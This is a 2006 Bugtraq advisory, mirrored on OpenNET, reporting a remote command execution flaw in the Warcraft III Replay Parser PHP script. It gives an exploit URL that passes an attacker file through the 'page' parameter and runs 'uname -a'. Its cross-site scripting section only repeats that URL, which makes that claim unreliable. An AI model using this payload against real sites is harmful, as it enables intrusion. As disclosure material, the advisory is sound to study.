OpenNET security: Warcraft III Replay Parser Script Remote Command Exucetion

Warcraft III Replay Parser Script Remote Command Exucetion


<< Previous	INDEX	Search	src / Print	Next >>

Date: 31 Mar 2006 19:34:40 -0000
From: botan@linuxmail.org
To: bugtraq@securityfocus.com
Subject: Warcraft III Replay Parser Script Remote Command Exucetion
 Vulnerability And Cross-Site Scripting Attacking
X-Virus-Scanned: antivirus-gw at tyumen.ru

Website : http://toya.net.pl/~julas/w3g/
Version : 1.8c 

Description :

Warcraft III Replay Parser for PHP? What is that? Maybe you know or maybe not that Warcraft III replay files (*.w3g) have much information inside. Almost everything can be pulled out of them: players accounts, races, colours, heroes and units made by each player, chat log and many more. If you are a webmaster of Warcraft III replay site or clan page you know how boring adding new replays can be without automation. This PHP script helps you provide as much information about replays on your site as possible without all the hard work. * 

I. Remote Command Exucetion ..

Yolumuz agitlerin yoludur.!

http://www.site.com/[path]/index.php?page=evilcode.txt?&cmd=uname -a

2.XSS Attacking

http://www.site.com/[path]/index.php?page=evilcode.txt?&cmd=uname -a

Solution : up version :)

Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

14'ler жlЭmsЭzdЭr.


<< Previous	INDEX	Search	src / Print	Next >>

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру